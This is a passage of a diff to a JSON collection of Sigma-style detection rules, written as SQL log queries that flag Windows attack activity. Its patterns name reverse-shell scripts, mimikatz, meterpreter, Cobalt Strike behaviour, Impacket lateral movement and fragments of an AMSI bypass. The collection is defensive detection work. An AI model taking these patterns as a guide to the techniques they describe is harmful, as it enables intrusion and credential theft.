"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Potential Rcdll.DLL Sideloading", - "id": "6e78b74f-c762-4800-82ad-f66787f10c8a", - "status": "experimental", - "description": "Detects potential DLL sideloading of rcdll.dll", - "author": "X__Junior", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\rcdll.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_rcdll.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Potential Iviewers.DLL Sideloading", - "id": "4c21b805-4dd7-469f-b47d-7383a8fcb437", - "status": "experimental", - "description": "Detects potential DLL sideloading of \"iviewers.dll\" (OLE/COM Object Interface Viewer)", - "author": "X__Junior", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\iviewers.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Kits\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Kits\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_iviewers.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", - "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", + "status": "test", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Very unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "title": "HackTool - Potential Impacket Lateral Movement Activity", + "id": "10c14723-61c7-4c75-92ca-9af245723ad2", + "status": "stable", + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Wab/Wabmig Unusual Parent Or Child Processes", + "id": "63d1ccc0-2a43-4f4b-9289-361b308991ff", + "status": "experimental", + "description": "Detects unusual parent or children of the wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) processes as seen being used with bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\')))" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_wab_unusual_parents.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Suspicious Service Binary Directory", + "id": "883faa95-175a-4e22-8181-e5761aeb373c", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a service binary running in a suspicious directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_susp_service_dir.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Potential CobaltStrike Process Patterns", + "id": "f35c5d71-b489-4e22-a115-f003df287317", + "status": "experimental", + "description": "Detects potential process patterns related to Cobalt Strike beacon activity", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1059" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cmd.exe /C whoami' ESCAPE '\\' AND ParentProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe /c echo%' ESCAPE '\\' AND CommandLine LIKE '%> \\\\\\\\.\\\\pipe%' ESCAPE '\\') OR (ParentCommandLine LIKE '%cmd.exe /C echo%' ESCAPE '\\' AND ParentCommandLine LIKE '% > \\\\\\\\.\\\\pipe%' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') OR (ParentCommandLine LIKE '%/C whoami' ESCAPE '\\' AND CommandLine LIKE '%conhost.exe 0xffffffff -ForceV1' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Griffon Malware Attack Pattern", + "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", + "status": "experimental", + "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE 